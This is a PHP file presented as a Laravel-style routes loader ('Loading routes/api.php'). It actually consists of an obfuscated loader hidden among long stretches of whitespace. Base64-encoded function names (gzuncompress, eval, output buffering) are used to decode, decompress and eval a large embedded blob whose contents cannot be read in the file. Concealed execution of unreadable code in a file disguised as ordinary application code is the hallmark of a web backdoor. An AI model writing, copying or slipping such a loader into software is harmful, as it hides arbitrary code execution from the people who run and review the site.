<?php 
        $__='printf';$_='Loading routes/api.php';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWl1vm0gUfY+0/yEPldzVrrJ82ElR5IdAAgY7ZA31MMxLBUMMjjGmxTbGv37vAE7ifqRut11pqznW2IBn5t577rkXlPj0tMGrd4B+J/8wy1bTzmV92qLf+bBcr+6Lv4J8dpYn+amWBkVxdnbWuTxpV5/+dsJfP+51wug//YHof3Klg0Wl8D1xRoybfqe+9JTNo9BKpH/KwcHB8WuiQxdIiLC1Ng0k+V65tHRliqv5RdM0oWs27fodp4qDg4ODg4ODg4Pj/wb+5wwODg6OXxedMCjuz7vvonu6jO47l5wRDg4ODg6Of4XD3w1cj5e2lqEdcVUrNLZi6KVrHzspvkmEaKDSyQJtIw/touvi8/N0W6QDdUMzhzoL/cH3nJSKWzeUkUDewppYGI4qZqNcjVzh546xMJxqqjq5mceThSJGBtpdj/M3P92uK7D42IhdA1XAUU4rVQ6a414oT2Jf0tfmwEqJlO7Ar8q80ceuq1Y1T/g2JgulMgfpJsJm7GO1DI30AfjNQ6m7NnVnSbCdslhgD5gDHFdqQheTODSUhBhobhpWzxzAPFdtuEd2SjOS+xIa04UiBSwvM/AJO8vA68a+q2ZwXaQa8zN9CK5q7vJ6X9nOidRLiaYKgTGJzYVeBq4ZQ87nxNimkaSzuNr13djxeu9DeR77GcpDA3xe0Pjeg+9mdS4S5jfo7P2oZFpQ6vzQOj+TNu5nvBi9NKpUkUqognWtjpbn1FB2kRZnI/lprlWVsSfoJdW3ZjRwSnxjb8LMqUJpWxBs7TDjGG1V4Gs5lpR1BNyBdlP6sDz3pS3EeVuYWlQRL8qpzPiJoiHT7OzNZoxUa8+1aZANxFKEUpSHsxd8k7Yb8G39g/xq7bU+1XWksFwKxLOFwOtlpt5qAXht9D45v1tETFPlUC+yw3zR+O+33dirooTZvcvsJFzYQuQJGUZCATGK7DzwlLWpxbk5YDxcxaamPsZJJCQMNQo2QVsz+tGaxCVYF0Gngqk51f546KoXkHvY56oZkOtogKpwdjWn+96iCX80e8b5HcTSzBOejts47x7yjODx0qqUEnhYBN42ZVyTDK19ua6VeKhbKcUopfI4tgaPx8/iacbTv4x14C1eDt0v+7D3//PaRSUxdAHqodVFM/cxHxn0Rrn2uf5+JO/nKxe1vUzIRpoajqHm9z33QBOZTZkWQTOwX3IdSj0B7Bch6B/4eAgNfUeBA+tx3ye9NLG+2Rz0GlddhLLJ+kbGzsH/HcHmJ7k+1DTEokG+9ZUKvZ66A0cAbR/4Aj0fuEnpGMQUHOjdBE3ahY/t3Ui7yvZ2LfGQ28/wtSY42kG/So+sp7ds7rjpQSmdf9kHqPUN9M4Mu/OLF+yXxBNnPrZE3+uuIkP5QLzu5l5WU+B8TaQoCY/Nne5sAgmtEVbn7J75Qs0/s9mbtja/7ie2Spj/HkY2wnbi49vv9NPOoa8iajgJfL6gNRXWqNA/chjRlEp6Qqt97/yCjg7W0BWF2oT+JIZQB9RABfOdwD1y6h6ns4mUwj2u1fzkhVyzNcBDsAAuRNY30CrAaLXX30f9pQxlu+lxnpUEmjgPJTEJvjvvx/KJZr6XTImhrHx4rvqab4GhlxG+XT3nbSSvQDtblo8MrinfUjMO7ENe1uUSnklEKirPbHxVlyvQcgLaWJNKFNjxCEMPqo7LLzLQykcwXzi2jnOl6Xv9fufy5OS/f6Du15+v27PfL79l+bO1xyx89WTwdYe9d/58NMt/7/tzfu97yP3rg2Q31P9++Q/9mvkx';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
